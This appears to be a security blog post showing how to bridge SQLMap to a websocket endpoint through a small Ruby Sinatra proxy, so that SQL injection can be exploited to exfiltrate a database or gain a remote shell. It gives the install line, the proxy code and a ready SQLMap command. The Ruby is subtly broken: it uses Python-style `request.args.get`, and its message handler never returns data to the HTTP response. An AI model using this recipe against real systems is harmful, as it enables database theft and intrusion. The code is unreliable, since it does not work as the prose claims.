Buy my course: Security for Rails Developers.
I was testing for SQL Injection on a target the other day, and after a little fuzzing indicated that there might be a vulnerability, I wanted to use SQLMap to make data exfiltration easier. But this vulnerability was part of a websocket request, and unfortunately, SQLMap doesn’t support websockets. One solution to this problem is to introduce a little proxy between the websocket endpoint and SQLMap and convert HTTP requests into websocket ones.
This is actually pretty simple to achieve with a few lines of Ruby. I decided to use a little Sinatra app with the faye-websocket gem as a websocket client. First, I installed the necessary gems:
gem install sinatra faye-websocket rackup puma
Then I added the following code to a file called app.rb:
require 'faye/websocket'
require 'sinatra'
get '/' do
ws = Faye::WebSocket::Client.new('ws://TARGET/cable')
ws.on :open do |_event|
message = {}
message['username'] = request.args.get('username', '')
ws.send(message.to_json)
end
ws.on :message do |event|
[:message, event.data]
ws.close
end
end
What’s happening here is that we add a “/” route handler to Sinatra, and in the handler, we create a websocket connection to the target. Then, we add an “open” handler that converts the GET parameters to the JSON the websocket endpoint expects, and when we receive back a message, we return that as the HTTP response and close the websocket connection.
We can run this little app with ruby app.rb and point SQLMap to the URL of the app:
python3 sqlmap.py -u http://127.0.0.1:4567/\?username\=test --threads=10 --batch
to exfiltrate the database or even get a remote shell if we are lucky.
A few lines of Ruby saved the day again.
Or follow me on Twitter
I run an indie startup providing vulnerability scanning for your Ruby on Rails app.
It is free to use at the moment, and I am grateful for any feedback about it.If you would like to give it a spin, you can do it here: Vulnerability Scanning for your Ruby on Rails app!
